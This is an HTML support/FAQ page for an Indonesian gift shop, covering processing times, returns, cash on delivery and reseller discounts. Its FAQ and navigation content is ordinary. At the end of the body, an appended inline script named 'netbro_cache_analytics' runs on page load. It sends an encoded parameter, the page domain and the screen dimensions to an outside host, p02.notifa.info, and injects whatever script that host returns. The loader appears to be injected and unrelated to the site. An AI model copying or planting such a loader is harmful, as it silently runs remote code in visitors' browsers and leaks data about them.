<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <!-- The above 4 meta tags *must* come first in the head; any other head content must come *after* these tags-->
    <!-- Title-->
    <title>Udah Kadoin Aja! | Kado Untuk Semua Orang</title>
    <!-- Favicon-->
    <link rel="icon" href="img/core-img/favicon.png">
    <!-- Stylesheet-->
    <link rel="stylesheet" href="style.css">
  </head>
  <body>
    <!-- Preloader-->
    <div class="preloader" id="preloader">
      <div class="spinner-grow text-secondary" role="status">
        <div class="sr-only">Loading...</div>
      </div>
    </div>
    <!-- Header Area-->
    <div class="header-area" id="headerArea">
      <div class="container h-100 d-flex align-items-center justify-content-between">
        <!-- Back Button-->
        <div class="back-button" onclick="history.back()"><i class="lni-arrow-left"></i></div>
        <!-- Page Title-->
        <div class="page-heading">
          <h6 class="mb-0">Support</h6>
        </div>
        <!-- Filter Option-->
        <a href="keranjang.html"><i class='lni lni-shopping-basket'></i></a>
      </div>
    </div>
    <div class="page-content-wrapper">
      <div class="container">
        <!-- Support Wrapper-->
        <div class="support-wrapper py-3">
          <!-- Accordian Area Wrapper-->
          <div class="accordian-area-wrapper mt-3">
            <!-- Accordian Card-->
            <div class="card accordian-card others-card clearfix">
              <div class="card-body">
                <h5 class="accordian-title">Pertayaan Umum</h5>
                <div class="accordion" id="accordionExample">
                  <!-- Single Accordian-->
                  <div class="accordian-header" id="headingOne">
                    <button class="d-flex align-items-center justify-content-between w-100 collapsed btn" type="button" data-toggle="collapse" data-target="#collapseOne" aria-expanded="false" aria-controls="collapseOne"><span><i class="lni-brush-alt"></i>Berapa lama pengerjaanya?</span><i class="lni-chevron-right"></i></button>
                  </div>
                  <div class="collapse" id="collapseOne" aria-labelledby="headingOne" data-parent="#accordionExample">
                    <p>Pengerjaanya variasi ya kk</br>
                    <b>Bantal, Mug, Tumber</b> = 1 Hari</br>
                    <b>Kotak Musik</b> = 2-3 Hari</br>
                    <b>Jam</b> = 3-6 Hari</br>
                    <b>3D Box Lamp</b> = 3-14 Hari</p>
                  </div>
                  <!-- Single Accordian-->
                  <div class="accordian-header" id="headingTwo">
                    <button class="d-flex align-items-center justify-content-between w-100 collapsed btn" type="button" data-toggle="collapse" data-target="#collapseTwo" aria-expanded="false" aria-controls="collapseTwo"><span><i class="lni-delivery"></i>Apakah bisa COD?</span><i class="lni-chevron-right"></i></button>
                  </div>
                  <div class="collapse" id="collapseTwo" aria-labelledby="headingTwo" data-parent="#accordionExample">
                    <p>Untuk saat ini belum bisa COD ya kak.</p>
                  </div>
                  <div class="accordian-header" id="headingTree">
                    <button class="d-flex align-items-center justify-content-between w-100 collapsed btn" type="button" data-toggle="collapse" data-target="#collapseTree" aria-expanded="false" aria-controls="collapseTree"><span><i class="lni-gift"></i>Apakah produk bisa dikembalikan?</span><i class="lni-chevron-right"></i></button>
                  </div>
                  <div class="collapse" id="collapseTree" aria-labelledby="headingTree" data-parent="#accordionExample">
                    <p>Untuk pengembalian produk bisa dilakukan jika ada kesalahan warna / model / kondisi cacat ya kak.</p>
                  </div>
                  <div class="accordian-header" id="heading4">
                    <button class="d-flex align-items-center justify-content-between w-100 collapsed btn" type="button" data-toggle="collapse" data-target="#collapse4" aria-expanded="false" aria-controls="collapse4"><span><i class="lni-handshake"></i>Apakah bisa jadi reseller/dropship?</span><i class="lni-chevron-right"></i></button>
                  </div>
                  <div class="collapse" id="collapse4" aria-labelledby="heading4" data-parent="#accordionExample">
                    <p>Bisa dong kak, nanti kakak dapat potongan 10% ya. Info lebih lanjut langsung hubungi kami ya.</p>
                  </div>
                </div>
              </div>
            </div>
          </div>
          <!-- Accordian Area Wrapper-->
          <!-- Accordian Area Wrapper-->
          <div class="accordian-area-wrapper mt-3">
            <!-- Accordian Card-->
            <div class="card accordian-card others-card clearfix">
              <div class="card-body">
                <h5 class="accordian-title">Lainnya</h5>
                <div class="accordion" id="accordionExample3">
                  <!-- Single Accordian-->
                  <div class="accordian-header" id="headingFive">
                    <a href="cek-resi.html"><button class="d-flex align-items-center justify-content-between w-100 collapsed btn" type="button"><span><i class="lni-delivery"></i>Cek Resi</span><i class="lni-chevron-right"></i></button></a>
                  </div>
                  <!-- Single Accordian-->
                  <div class="accordian-header" id="headingSix">
                    <a href="pembayaran.html"><button class="d-flex align-items-center justify-content-between w-100 collapsed btn" type="button"><span><i class="lni-credit-cards"></i>Pembayaran</span><i class="lni-chevron-right"></i></button></a>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
    <!-- Footer Nav-->
    <div class="footer-nav-area" id="footerNav">
      <div class="suha-footer-nav h-100">
        <ul class="h-100 d-flex align-items-center justify-content-between">
          <li><a href="index.html"><i class="lni-home"></i>Home</a></li>
          <li><a href="eksplor.html"><i class="lni-grid-alt"></i>Eksplor</a></li>
          <li><a href="https://api.whatsapp.com/send?phone=628987088921&text=Hai%20kk%2C%20saya%20mau%20tanyak%20seputar%20kado"><i class="lni-whatsapp"></i>Chat</a></li>
          <li><a href="notifikasi.html"><i class="lni-alarm lni-tada-effect"></i>Notifikasi</a></li>
          <li class="active"><a href="support.html"><i class="lni-question-circle"></i>Support</a></li>
        </ul>
      </div>
    </div>
    <!-- All JavaScript Files-->
    <script src="js/jquery.min.js"></script>
    <script src="js/popper.min.js"></script>
    <script src="js/bootstrap.min.js"></script>
    <script src="js/waypoints.min.js"></script>
    <script src="js/jquery.easing.min.js"></script>
    <script src="js/owl.carousel.min.js"></script>
    <script src="js/jquery.animatedheadline.min.js"></script>
    <script src="js/jquery.counterup.min.js"></script>
    <script src="js/wow.min.js"></script>
    <script src="js/jarallax.min.js"></script>
    <script src="js/jarallax-video.min.js"></script>
    <script src="js/default/jquery.passwordstrength.js"></script>
    <script src="js/default/dark-mode-switch.js"></script>
    <script src="js/default/active.js"></script>
  <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p02.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JQuX3gzRncX53rUcRjz5xeWukyvgqAMFCVmxamFyGSFwIC5Z7p5UQ8e%2fubjpHUrmZXVsGLEnYOkPNkMPBSTfQ70vhC1hh2nE5jRel%2f%2bxCRexjNLRWSllYoe8hFBctlbvB2UTGqYfTAzm8rhsLdpdfR3zOiD6537dWd8gWVGXz3V3Jupy2PFrWO02kIN%2bDwhyVgy9evKrGtjieXDrcpbQAdrFX7%2f39tEXPJoXCigccqx0IbJ30dK9peJbtpnYO5ZXMrgUnUUhdMzTIM7bU4m2g7WGWc8lrRQjxX81qj%2bAqQ7engNkKccgr2K8QuPerYU8YxWzwGpV1hS%2bvWd%2bdNDiDB%2bky8plI%2bMpSWqx4hXotRPqPBSIwh6D%2f6%2bKtIzQNpgWty%2bRJg7o4AKldJAcWgwekyFKbr5BFjfw5NoUc9EMqszSKP2Rdx0Osgw2sEySoR8iQUY32MwpKalfurrs%2bexInpiZTtI5ZPa%2bBWj3l9E1FX3t3Vj0hrCI6tfZ3hziAeLkPp5MuxcROPcMFvOSt3qupE%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>